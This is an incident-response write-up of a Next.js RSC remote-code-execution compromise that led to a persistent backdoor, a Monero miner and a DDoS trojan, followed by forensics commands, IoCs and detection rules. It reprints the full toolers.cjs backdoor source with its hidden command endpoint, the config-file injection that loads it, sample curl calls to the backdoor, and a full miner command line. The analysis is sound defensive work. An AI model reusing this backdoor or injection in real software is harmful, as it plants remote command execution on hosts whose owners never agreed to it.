

What started as “why is CPU hot again?” ended with a full kill-chain reconstruction: public Next.js RSC RCE exploit, in-memory shell, persistent toolers.cjs backdoor, then 28 days of Monero mining plus a dormant DDoS payload.

This is a technical, command-first write-up: what was observed, how it was validated, and how the findings were converted into durable detections.

Introduction#

This incident was not noisy at first. No ransomware banner, no obvious defacement, no dramatic outage.

Instead, telemetry showed a long, quiet burn:

- sustained CPU pressure,

- non-standard outbound traffic,

- and executable sprawl in places that should have stayed boring (`~/.cache`, `/dev/shm`).

The turning point came after correlating host artifacts with prior CVE-2025-66478 analysis: the toolers.cjs implant used the same http.Server.prototype.emit monkey patching pattern, hidden command endpoint, and child_process.execSync execution flow seen in public runtime memory shell demonstrations.

Incident Snapshot#

| Signal | Finding |

|---|---|

| Dwell time | ~28 days (Jan 2 to Jan 30, 2026) |

| Active miner | XMRig, persistent CPU abuse |

| Secondary payload | DDoS-capable trojan, mass replicated |

| File blast radius | 1,567+ identical malicious binaries observed |

| Primary persistence | @reboot cron entry under compromised user |

| Key network IOC | 46.250.239.154:10128 (gulf.moneroocean.stream) |

Environment and Telemetry (Sanitized)#

This matters because detections should be opinionated about the stack they protect. The investigated environment looked like this:

| Layer | Observed Components |

|---|---|

| Host | Ubuntu 22.04.x, single internet-facing app server |

| Frontend | Next.js (RSC enabled) |

| Backend | Django/Gunicorn |

| Edge | Nginx reverse proxy |

| Data | PostgreSQL |

| Runtime | Docker present (not primary attack surface in this case) |

Control gaps observed in the affected environment:

- no long-retention web access logs covering the initial compromise window,

- no file integrity monitoring on home directories,

- no default-deny outbound policy.

Attack Chain (Reconstructed)#

Jan 2, 2026 - Initial Access via Next.js RSC RCE

Attacker exploited a Next.js React Server Components (RSC) server-side execution flaw (CVE-2025-66478), part of the broader React2Shell-class exploitation patterns documented for CVE-2025-55182.

Jan 2, 2026 - Backdoor Upgrade

Memory shell was converted into a persistent file-based implant: `toolers.cjs`, with API key gating and endpoint camouflage (`/_cluster/report`).

Jan 2-3, 2026 - Payload Deployment and Persistence

Backdoor-enabled RCE was used to deploy dropper + miner. Cron `@reboot` ensured restart persistence. Malware also used self-healing loops.

Jan 3-30, 2026 - Resource Hijacking

Miner maintained pool connectivity and consumed host resources. DDoS binary set remained available for remote tasking.

Jan 30, 2026 - Containment

IR team blocked egress IOC, terminated malicious processes, removed cron persistence, collected forensic artifacts, and rotated credentials.

Confirming Initial Access: Next.js RSC RCE (React2Shell-class)#

Early in triage, two competing hypotheses emerged:

- someone dropped a backdoor via SSH (credential compromise), or

- someone exploited the web stack (public-facing app RCE).

Attribution confidence increased after comparing the on-disk implant to publicly documented Next.js RSC exploitation patterns and runtime memory shell characteristics.

Understanding the Vulnerability#

React2Shell (CVE-2025-55182) describes a broader class of RSC exploitation patterns. In this incident, evidence aligned most strongly with a Next.js RSC server-side execution path tracked as CVE-2025-66478.

The vulnerability lets attackers execute arbitrary JavaScript inside the Node.js process by sending specially crafted HTTP requests that abuse unsafe deserialization of React Server Components payloads. Public exploit payloads reach that point by traversing `__proto__` references.

Public Research and Validation Tools#

During investigation, we correlated findings with the public GitHub repository Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478, which provides a scanner and supporting research artifacts for identifying potentially vulnerable Next.js RSC deployments. We used it for validation and to compare observed implant patterns against publicly documented techniques.

The Runtime Memory Shell Pattern#

Public discussions of this vulnerability class demonstrate a common exploitation pattern: injecting a “runtime memory shell” that monkey-patches Node’s HTTP server to add a backdoor endpoint. The basic behavioral signature involves:

- Overriding `http.Server.prototype.emit` to intercept HTTP requests

- Checking for a specific backdoor endpoint path

- Executing arbitrary commands via `child_process` methods

- Passing non-matching requests to the original handler

This gives attackers a simple web shell accessible via HTTP, but it only lives in the running Node.js process memory. If the server restarts, the backdoor disappears—unless the attacker upgrades it to persistent storage.

The Backdoor: toolers.cjs — Persistent Upgrade#

The threat actor didn’t settle for a volatile memory shell. They upgraded to a persistent, authenticated backdoor saved as toolers.cjs.

Backdoor Code Structure (Full Source)#

const http = require("http");

const child_process = require("child_process");

const API_KEY = "t5uGxN4deg0xQQaDc2CVtewN";

const BACKDOOR_PATH = "/_cluster/report";

const originalEmit = http.Server.prototype.emit;

http.Server.prototype.emit = function(event, ...args) {

if (event === "request") {

const [request, response] = args;

try {

const url = new URL(request.url, "http://x");

if (url.pathname === BACKDOOR_PATH) {

// Authentication check

if (request.headers["api-key"] !== API_KEY) {

response.writeHead(401);

response.end("Unauthorized");

return true;

}

// Command execution

const command = url.searchParams.get("0");

if (command) {

response.writeHead(200);

response.end(child_process.execSync(command).toString());

return true;

}

}

} catch(e) {}

}

return originalEmit.apply(this, arguments);

};

Operational Characteristics#

The backdoor exposed an authenticated HTTP endpoint that returned command output. Example of attacker usage pattern (for detection purposes):

# Pattern observed in threat actor operations:

curl -H "api-key: t5uGxN4deg0xQQaDc2CVtewN" \
"https://target.example.com/_cluster/report?0=whoami"

curl -H "api-key: t5uGxN4deg0xQQaDc2CVtewN" \
"https://target.example.com/_cluster/report?0=id"

This enabled remote tasking while minimizing application-layer visibility. Key behavioral traits:

- Endpoint camouflage: `/_cluster/report` mimics Elasticsearch cluster health endpoints

- Authentication gate: Required a specific header to prevent unauthorized access or other threat actor interference

- Obfuscated parameters: Used non-obvious query parameter names

- Silent error handling: Wrapped in try/catch to suppress runtime errors

- Early request interception: Processed before reaching Next.js routing layer

Why .cjs Extension Matters#

In modern Node.js projects, .cjs files are always treated as CommonJS modules, regardless of package.json settings. This makes the backdoor reliable across different Next.js configurations.

Persistence Mechanism#

The backdoor was injected into the Next.js configuration file:

// next.config.ts (observed injection pattern)

try { require("./src/app/event/toolers.cjs"); } catch (_) {}

This line:

- Loads the backdoor on every server start (dev, build, production)

- Runs before the application handles requests

- Suppresses errors with `try/catch` (stealth)

- Survives server restarts and deployments
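Because the persistence hook is a single `require()` of a relative path inside the framework config, a quick audit can list every such call for manual review. The sketch below is one way to do that, not the tooling used in this investigation. The function name `list_config_requires` and the set of config filenames it checks are assumptions chosen for illustration.

```shell
# Hypothetical helper: print every require() of a relative path found in
# Next.js config files directly under a project root (default: current dir).
list_config_requires() {
    root="${1:-.}"
    for cfg in "$root"/next.config.js "$root"/next.config.mjs \
               "$root"/next.config.cjs "$root"/next.config.ts; do
        [ -f "$cfg" ] || continue
        # The lone "." after "\(" stands in for whichever quote character is
        # used; "\.{1,2}/" then matches a leading "./" or "../".
        grep -HnE 'require\(.\.{1,2}/' "$cfg" || true
    done
    return 0
}

# Usage: list_config_requires /path/to/app
```

Any hit still needs a human decision: legitimate configs sometimes load local helpers, so the output is a review list rather than a verdict.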

Backdoor Evolution Comparison#

| Attribute | Public Memory Shell Pattern | toolers.cjs (Observed) |

|---|---|---|

| Endpoint | Obvious paths (e.g., /exec, /cmd) | /_cluster/report (infrastructure mimicry) |

| Authentication | None or weak | Header-based API key validation |

| Parameter | Clear names (?cmd=, ?command=) | Obfuscated (?0=) |

| Delivery | In-memory (volatile) | Persisted to disk as .cjs file |

| Module System | ES modules (import) | CommonJS (require()) for reliability |

| Error Handling | Verbose errors | Silent try/catch (stealth) |

Technical Notes for Code Auditors#

Key details that materially affected triage:

- The implant was tiny (about 547 bytes), minified, and loaded as a CommonJS module (`.cjs`)

- Load path was hidden in config startup code

- After handling the backdoor endpoint, code returns early (`return true`) and does not pass the request to normal app handlers, reducing app-layer visibility

- Logic is wrapped in silent `try/catch`, suppressing runtime errors that might otherwise create obvious logging noise

Code Audit Indicators#

If you are auditing a Node/Next codebase for this class of implant, these searches are high-signal:

# Search for HTTP server monkey-patching patterns

rg -n "http\\.Server\\.prototype\\.emit|child_process\\.execSync" .

# Search for suspicious endpoint patterns

rg -n "/_cluster/report|/_admin|/_internal" .

# Find all .cjs files in unexpected locations

find . -name "*.cjs" -not -path "*/node_modules/*"

If you find `http.Server.prototype.emit` being reassigned in application code, treat it as suspicious until proven otherwise.
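The searches above match either indicator on its own. A tighter variant is to flag only files that contain both the `emit` reference and `child_process`, which is the combination the implant needs. The sketch below uses plain `find` and `grep` so it runs on hosts without ripgrep. The function name `find_emit_patchers` and the extension list are assumptions for illustration.

```shell
# Hypothetical helper: list source files under a root that reference BOTH
# http.Server.prototype.emit and child_process, skipping node_modules.
find_emit_patchers() {
    root="${1:-.}"
    find "$root" -type d -name node_modules -prune -o \
        -type f \( -name '*.js' -o -name '*.cjs' -o -name '*.mjs' -o -name '*.ts' \) -print |
    while IFS= read -r f; do
        # Both patterns must be present in the same file to report it.
        if grep -q 'http\.Server\.prototype\.emit' "$f" &&
           grep -q 'child_process' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Usage: find_emit_patchers /path/to/app
```

Requiring both strings trades recall for precision: an implant that aliases `http.Server.prototype` or loads `child_process` indirectly would slip past, so this complements the broader searches rather than replacing them.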

Malware Mechanics: The Cache Hydra#

The dropper and trojan behavior showed classic commodity botnet economics:

- multiple binaries copied into writable paths,

- process masquerading names that looked system-ish,

- watchdog-style loops to respawn killed processes,

- self-deletion and deleted-file-handle execution for anti-forensics.

Representative validation from collected artifacts:

find ~/.cache -type f -executable | xargs sha256sum | cut -d' ' -f1 | sort | uniq -c

1567 f26c42805f8ebbff5ce9be40ddd02bcf54acdbfc97a78c7ade7688d8b064bdc4

Direct sample hash confirmation:

sha256sum /home/[redacted]/.cache/.sys8Py7HQRDBZ /tmp/miner_binary /tmp/libsystemd_core.sh

f26c42805f8ebbff5ce9be40ddd02bcf54acdbfc97a78c7ade7688d8b064bdc4 .cache/.sys8Py7HQRDBZ

364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c /tmp/miner_binary

093c2390fea2f9839eff0c69e2d064ccda17f59d0bf863abc8c0067244d6c63d /tmp/libsystemd_core.sh

In this dataset, one hash appeared 1,567 times (f26c42805f8ebbff5ce9be40ddd02bcf54acdbfc97a78c7ade7688d8b064bdc4), with additional variants seen during broader IOC validation.
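The duplicate-hash count is easy to turn into a reusable filter that reports only hashes repeated above a threshold. The sketch below reads `sha256sum`-style lines on stdin. The function name `repeated_hashes` and the default threshold of 10 are assumptions for illustration, not values taken from the investigation.

```shell
# Hypothetical helper: read "<hash>  <path>" lines on stdin and print
# "<count> <hash>" for every hash seen at least MIN times (default 10),
# highest count first.
repeated_hashes() {
    min="${1:-10}"
    awk -v min="$min" '
        { count[$1]++ }
        END { for (h in count) if (count[h] >= min) print count[h], h }
    ' | sort -rn
}

# Usage:
#   find ~/.cache -type f -executable -exec sha256sum {} + | repeated_hashes 10
```

A threshold keeps the output short on hosts where a few legitimate duplicates exist, while a mass-replicated binary like the one observed here still stands out immediately.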

Why ~/.cache and /dev/shm Keep Appearing#

Attackers favor locations that are:

- writable by unprivileged users,

- noisy enough to hide in,

- and rarely monitored.

Two favorites:

- `~/.cache`: “junk drawer” semantics, few baselines, lots of legitimate churn

- `/dev/shm`: in-memory tmpfs, often fast, often executable, frequently ignored by file monitoring

Dropper Behavioral Traits#

The dropper script (libsystemd_core.sh) exhibited several traits common in commodity cloud malware:

- Selects writable working directory from a short list (`~/.cache`, `~/.config`, `/tmp`, `/dev/shm`)

- Deploys architecture-appropriate payload (multi-arch support increases hit-rate)

- Runs watchdog loop to restart the miner if it dies

- Attempts basic anti-forensics (self-delete or overwrite)

The operational point is not the exact script mechanics; it is the pattern: persistence + regeneration.

Host Forensics: The Evidence That Mattered#

This section is intentionally CLI-heavy. When you are under time pressure, you want commands that answer specific questions quickly.

Process Triage#

These were the fastest signal generators:

ps auxf

ps -eo pid,ppid,user,etime,pcpu,pmem,cmd --sort=-pcpu | head -n 25

pstree -a -p | head -n 80

Representative output:

2667536 1 [redacted] 27-xx:xx:xx 0.0 0.2 sh libsystemd_core.sh

2523017 1 [redacted] 28-xx:xx:xx 32.0 1.1 /dev/shm/.x/m -o gulf.moneroocean.stream:10128 \

-u 43yiB8RenFLGQdK97HGVpLjVeQaCSWDbaec2ZQcav6e7a3QnDEmKq3t3oUoQD9HgwXAW8RQTWUdXxN5WGtpStxAtRrH5Pmf \

-p wmjw4al3q --cpu-max-threads-hint=75 -B --donate-level=0

Hunt focus:

- Long-lived processes with high CPU

- Executables launched from user-writable paths

- Orphans (PPID 1) or suspicious parentage (shell → random binary)
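The hunt focus above can be sketched as a filter over the `ps -eo pid,ppid,user,etime,pcpu,pmem,cmd` output already shown. It keeps processes that are orphaned (PPID 1), launched from a user-writable path, and older than a minimum age. The function name `long_lived_orphans`, the path list, and the one-day default are assumptions for illustration.

```shell
# Hypothetical helper: filter `ps -eo pid,ppid,user,etime,pcpu,pmem,cmd`
# output (stdin) for PPID-1 processes started from user-writable paths and
# running for at least MIN_DAYS (default 1). Prints "<pid> <etime> <exe>".
long_lived_orphans() {
    min_days="${1:-1}"
    awk -v min_secs="$((min_days * 86400))" \
        -v pat='^(/tmp/|/var/tmp/|/dev/shm/|/home/[^/]+/[.](cache|config|local)/)' '
        # ps etime is formatted as [[DD-]hh:]mm:ss; convert it to seconds.
        function etime_secs(e,   d, n, p) {
            d = 0
            if (index(e, "-") > 0) { split(e, p, "-"); d = p[1]; e = p[2] }
            n = split(e, p, ":")
            if (n == 3) return d * 86400 + p[1] * 3600 + p[2] * 60 + p[3]
            return d * 86400 + p[1] * 60 + p[2]
        }
        # Numeric first field skips the header line.
        $1 ~ /^[0-9]+$/ && $2 == 1 && $7 ~ pat && etime_secs($4) >= min_secs {
            print $1, $4, $7
        }'
}

# Usage: ps -eo pid,ppid,user,etime,pcpu,pmem,cmd | long_lived_orphans 1
```

The filter only inspects the first word of the command, so an interpreter-launched script such as `sh libsystemd_core.sh` will not match. That case is better caught through the working directory or open file handles.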

Network Triage#

To confirm resource hijacking, CPU-heavy processes were correlated with outbound connections:

ss -tunap

netstat -tunap

lsof -i -n -P | head -n 50

Representative output:

tcp ESTAB 0 0 192.1.200.35:49308 46.250.239.154:10128 users:(("m",pid=2523017,fd=12))

Telemetry showed persistent outbound connections to:

- gulf.moneroocean.stream:10128

- 46.250.239.154:10128

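Why port 10128? Mining pools commonly expose Stratum on non-default ports, which sidesteps naive port-based blocks (many defenders only block 3333/4444/5555). Note that the observed command line carries no `--tls` flag, so this session was most likely plain Stratum rather than Stratum-over-TLS.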

Persistence Triage (Cron)#

crontab -l

crontab -l | rg "@reboot"

rg -n "@reboot" /var/spool/cron /var/spool/cron/crontabs /etc/cron.* /etc/crontab 2>/dev/null

Representative output:

@reboot /home/[redacted]/.cache/sslsessiond

@reboot /home/[redacted]/.cache/oom_reaper

The persistence anchor was a user crontab entry executing a file from `~/.cache` at boot.

Deleted File Handles (Anti-Forensics Tell)#

One valuable indicator was a process executing from a deleted file handle—common when malware wants to reduce on-disk artifacts:

ls -la /proc/<pid>/fd

readlink /proc/<pid>/exe

Representative output:

lr-x------ 1 [redacted] [redacted] 64 Jan 30 14:10 10 -> /home/[redacted]/.cache/.m2/libsystemd_core.sh (deleted)

/dev/shm/.x/m (deleted)

If you see `(deleted)` in file descriptor links, treat it as a high-severity investigation lead.
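Checking one PID at a time does not scale during triage, so the same test can be swept across every process. The sketch below walks the `exe` links under `/proc` and prints those whose target ends in ` (deleted)`. The function name `find_deleted_exes` is an assumption, and the optional root argument exists only so the logic can be exercised against a fake tree.

```shell
# Hypothetical helper: print "<pid> <target>" for each process whose exe
# symlink target ends in " (deleted)". The proc root is overridable.
find_deleted_exes() {
    proc_root="${1:-/proc}"
    for exe in "$proc_root"/[0-9]*/exe; do
        # Unreadable links (other users' processes, kernel threads) are skipped.
        target=$(readlink "$exe" 2>/dev/null) || continue
        case "$target" in
            *" (deleted)")
                pid=${exe%/exe}
                printf '%s %s\n' "${pid##*/}" "$target"
                ;;
        esac
    done
}

# Usage (run as root to see every user's processes): find_deleted_exes
```

Expect some benign hits after package upgrades, when a long-running service still maps a binary that has since been replaced. The path (`/dev/shm`, `~/.cache`) is what separates those from the case seen here.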

Indicators of Compromise (IoCs)#

Network IoCs#

| Indicator | Type | Notes |

|---|---|---|

| `gulf.moneroocean.stream:10128` | domain:port | mining pool |

| `46.250.239.154:10128` | ip:port | mining pool endpoint |

| `moneroocean.stream` | domain | related infra |

| `AS141995` | ASN | infrastructure observed in SG-hosted mining traffic |

File/Hash IoCs (SHA256)#

| Hash (full SHA256) | Component |

|---|---|

| `f26c42805f8ebbff5ce9be40ddd02bcf54acdbfc97a78c7ade7688d8b064bdc4` | DDoS trojan (mass-replicated binaries) |

| `364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c` | XMRig miner binary |

| `093c2390fea2f9839eff0c69e2d064ccda17f59d0bf863abc8c0067244d6c63d` | dropper script (libsystemd_core.sh) |

| `83ba11da89aa7957d9116cbef3a4427bc16cf354276d1ef81b9fc77cd0e7a01d` | trojan variant hash |

| `2b15a4f07f54f9bc90e35aa8abf442cf622e55d131d382023c766df6c3362822` | trojan variant hash |

| `d96c34a2c192ebf5b29b3609583dbd0db2979cd1d121c1670feea46fb6ee9ac3` | trojan variant hash |

Path/Pattern IoCs#

| Pattern | Why it matters |

|---|---|

| `~/.cache/.m2/` and `~/.cache/.systemd/` | staging areas used by malware |

| `/dev/shm/.x/` | common miner staging path |

| `@reboot /home/[redacted]/.cache/sslsessiond` | primary persistence observed |

| `@reboot /home/[redacted]/.cache/oom_reaper` | additional persistence variant |

| `@reboot.*\.cache/[a-z_]+` | useful generic hunt pattern |

| `/_cluster/report` | backdoor endpoint pattern |

| `toolers.cjs` | backdoor filename observed |

Behavioral IoCs#

| Behavior | Detection Opportunity |

|---|---|

| `http.Server.prototype.emit` reassignment in app code | Code audit / runtime monitoring |

| `child_process.execSync` in unexpected modules | Static analysis / runtime hooks |

| `.cjs` files in application source (not `node_modules`) | File integrity monitoring |

| `require()` calls in config files loading non-config paths | Config file auditing |

Wallet / Operator IoCs#

| Indicator | Type | Notes |

|---|---|---|

| `43yiB8RenFLGQdK97HGVpLjVeQaCSWDbaec2ZQcav6e7a3QnDEmKq3t3oUoQD9HgwXAW8RQTWUdXxN5WGtpStxAtRrH5Pmf` | Monero wallet | miner payout address |

| `wmjw4al3q` | worker id | miner worker label |

Fast Validation Commands#

# Check for active mining connections

ss -tunap | rg "46.250.239.154|10128|gulf.moneroocean"

# Check for suspicious cron entries

crontab -l | rg "@reboot.*\.(cache|config|local/share)"

# Hunt for executable files in user writable paths

find ~/{.cache,.config,.local} /tmp /dev/shm -type f -executable 2>/dev/null

# Search codebase for backdoor patterns

rg -n "http\.Server\.prototype\.emit" --type js

Detection and Response Engineering#

- Alert when executables appear in user-writable paths (`~/.cache`, `/tmp`, `/dev/shm`)

- Alert on suspicious cron `@reboot` entries pointing to user-writable locations

- Track long-running high-CPU processes whose executable path is outside trusted system directories

- Monitor for processes running from deleted file handles

- Flag egress to known mining pool domains and non-standard mining ports (`10128`, `3333`, `5555`, `14433`)

- Correlate unusual outbound persistence with process ancestry from suspicious paths

- Treat long-lived TLS sessions to unknown infrastructure as hunt candidates

- Monitor for Stratum protocol patterns on non-standard ports

- Watch for suspicious requests matching RSC exploit patterns (`$1:__proto__:then`, abnormal `Next-Action` usage)

- Detect hidden administrative paths (e.g., `/_cluster/*`, `/_admin/*`, `/_internal/*`) with custom headers

- Add file-integrity monitoring for unexpected `.cjs` additions in application source trees

- Alert on modifications to framework config files (e.g., `next.config.ts`, `next.config.js`)

- Audit for `http.Server.prototype` modifications in application code

- Review all `require()` statements in config files

- Scan for `child_process` usage in non-build-tool contexts

- Monitor for `.cjs` files outside `node_modules/`

One Practical Rule: Correlate Weak Signals#

Any single indicator can be noisy:

- high CPU can be a load spike,

- `@reboot` can be legitimate,

- outbound TLS can be normal.

But the combination caught this incident:

- High CPU + long runtime

- Executable path under `~/.cache` or `/dev/shm`

- Outbound connection to mining pool endpoint

If your SIEM/EDR cannot express this correlation, you will keep losing time to single-signal triage.
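Where no SIEM rule exists yet, a rough version of this correlation can be run on the host from saved `ss -tunap` and `ps -eo pid,ppid,user,etime,pcpu,pmem,cmd` output. The sketch below joins the two on PID and reports a process only when three of the signals line up: CPU above a threshold, an executable under a user-writable path, and a peer port on a watchlist (the runtime check is left out to keep it short). The function name `correlate_signals`, the 25% CPU default, and the path list are assumptions. The port watchlist reuses the ports named in the detection list above.

```shell
# Hypothetical helper: correlate saved `ss -tunap` output (file 1) with saved
# `ps -eo pid,ppid,user,etime,pcpu,pmem,cmd` output (file 2).
# Prints "<pid> <pcpu> <exe> <peer>" when all three signals match.
correlate_signals() {
    ss_file="$1"; ps_file="$2"; min_cpu="${3:-25}"
    awk -v min_cpu="$min_cpu" \
        -v ports=',10128,3333,5555,14433,' \
        -v pat='^(/tmp/|/dev/shm/|/home/[^/]+/[.]cache/)' '
        # Pass 1 (ss file): remember PIDs whose peer port is on the watchlist.
        FILENAME == ARGV[1] {
            if (match($0, /pid=[0-9]+/)) {
                pid = substr($0, RSTART + 4, RLENGTH - 4)
                peer = ""
                # The peer address:port is the field just before users:(...).
                for (i = 2; i <= NF; i++) if ($i ~ /^users:/) peer = $(i - 1)
                n = split(peer, part, ":")
                if (n > 1 && index(ports, "," part[n] ",")) net[pid] = peer
            }
            next
        }
        # Pass 2 (ps file): require high CPU and a user-writable exe path too.
        ($1 in net) && $5 + 0 >= min_cpu && $7 ~ pat {
            print $1, $5, $7, net[$1]
        }
    ' "$ss_file" "$ps_file"
}

# Usage:
#   ss -tunap > ss.txt; ps -eo pid,ppid,user,etime,pcpu,pmem,cmd > ps.txt
#   correlate_signals ss.txt ps.txt 25
```

Only the first `pid=` on each `ss` line is considered, so sockets shared by several processes are under-reported. For a quick host-side check that limitation is usually acceptable.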

Representative Containment Sequence#

Immediate actions taken:

Block egress to known IoCs

- Host firewall rules for mining pool destinations

- Perimeter blocks for associated ASNs if broader impact suspected

Terminate malicious process tree

- Identify parent/child relationships via `pstree`

- Terminate in dependency order to prevent respawn

Remove persistence mechanisms

- User crontab entries

- Systemd user units

- Shell profile modifications

- Application config injections

Collect forensic artifacts

- Process listings with full command lines

- Network connection states

- File samples from malware staging paths

- Memory dumps of suspicious processes (if tooling available)

Rotate credentials and tokens

- Application service accounts

- Database credentials

- API keys and secrets

- SSH keys for compromised user

Patch and rebuild

- Update Next.js to patched versions

- Review and clean application source tree

- Consider full rebuild from clean source if repo integrity uncertain
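For the first step in the sequence above (blocking egress to known IoCs), one cautious approach is to generate the host firewall commands as text and review them before anything is applied. The sketch below reads `ip:port` pairs on stdin and prints `iptables` rules without executing them. The function name `egress_block_rules` is an assumption, and hosts managed through `nftables` or `ufw` would need the equivalent syntax instead.

```shell
# Hypothetical dry-run helper: read "ip:port" IoCs on stdin and print
# (never execute) one iptables egress block per entry.
egress_block_rules() {
    while IFS=: read -r ip port; do
        # Skip blank or malformed lines that lack either part.
        [ -n "$ip" ] && [ -n "$port" ] || continue
        printf 'iptables -I OUTPUT -d %s -p tcp --dport %s -j DROP\n' "$ip" "$port"
    done
}

# Usage: printf '%s\n' '46.250.239.154:10128' | egress_block_rules
```

Printing instead of executing leaves a reviewable record of exactly what was blocked, which helps when the same rules later need to be mirrored at the perimeter.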

Post-action verification:

# Confirm process termination

ps aux | rg -i "xmr|miner|moneroocean|libsystemd_core|/dev/shm/"

# Confirm network cleanup

ss -tunap | rg "moneroocean|46.250.239.154"

# Confirm persistence removal

crontab -l

systemctl --user list-units

Evidence Collection (Before Containment)#

If time permits, collect evidence before terminating processes:

mkdir -p /tmp/ir_{processes,network,files,memory}

# Process state

ps auxf > /tmp/ir_processes/ps_auxf.txt

pstree -a -p > /tmp/ir_processes/pstree.txt

# Network state

ss -tunap > /tmp/ir_network/ss_tunap.txt

netstat -anp > /tmp/ir_network/netstat.txt

# User persistence

crontab -l > /tmp/ir_files/crontab_user.txt

systemctl --user list-units > /tmp/ir_files/systemd_user_units.txt

# File samples (if safe to collect)

cp /home/[redacted]/.cache/.sys* /tmp/ir_files/ 2>/dev/null

If a process is running from a deleted file handle, you may be able to extract it from `/proc/<pid>/exe` or `/proc/<pid>/fd/<n>` before termination.
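Recovering a deleted binary from `/proc` can be sketched as a small helper that copies the file behind `/proc/<pid>/exe` into an evidence directory and records its SHA256 alongside it. The function name `recover_exe` and the output file naming are assumptions. The optional third argument only exists so the logic can be tested against a fake proc tree.

```shell
# Hypothetical helper: copy the binary behind <proc_root>/<pid>/exe into an
# evidence directory and write its SHA256 next to it.
recover_exe() {
    pid="$1"; out_dir="$2"; proc_root="${3:-/proc}"
    mkdir -p "$out_dir" || return 1
    # cp follows the exe link, which still resolves to the file contents
    # while the process is alive, even if the on-disk path was unlinked.
    cp "$proc_root/$pid/exe" "$out_dir/$pid.exe.bin" || return 1
    # Hash relative to the evidence directory so the record is portable.
    (cd "$out_dir" && sha256sum "$pid.exe.bin" | tee "$pid.exe.sha256")
}

# Usage (as root, before killing the process):
#   recover_exe 2523017 /tmp/ir_files
```

The copy has to happen while the process is still running, which is why this belongs before the termination step.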

Lessons Worth Keeping#

Patch latency on internet-facing frameworks is an attacker advantage

The dwell time began during a period of active exploitation following public disclosure and widespread scanning of affected RSC deployments.

Egress monitoring is a primary detection control

Mining pool connections were the most reliable long-term signal.

“Boring” directories deserve first-class threat hunting

`~/.cache` and `/dev/shm` are attacker favorites for good reason.

Public exploit release + unpatched edge service = predictable compromise

Once vulnerability details and scanning tools are public, the window for exploitation is measured in hours, not weeks.

Cryptomining is often just the visible payload

The DDoS trojan was dormant but deployed, so keep hunting for parallel objectives.

If you cannot answer “how does it persist?” you are not done yet

Killing processes without removing persistence mechanisms guarantees reinfection.

Correlation beats individual signals

No single indicator was definitive, but the pattern was unmistakable: high CPU + suspicious paths + mining pool traffic.

Final Thoughts#

The attacker did not need custom zero-days or elite malware. They needed:

- One exploitable web path

- One writable account context

- Enough time

Once the CVE-to-backdoor correlation was confirmed, the pattern became clear: exploit, persist, monetize, blend in.

The corrective path is equally clear:

- Patch faster

- Restrict egress

- Monitor execution in user-writable paths

- Treat weak signals as a chain instead of isolated events

- Audit application code for suspicious patterns

This incident reinforced a core principle: defenders don’t need to catch everything, but they need to catch the combination before it costs weeks of dwell time.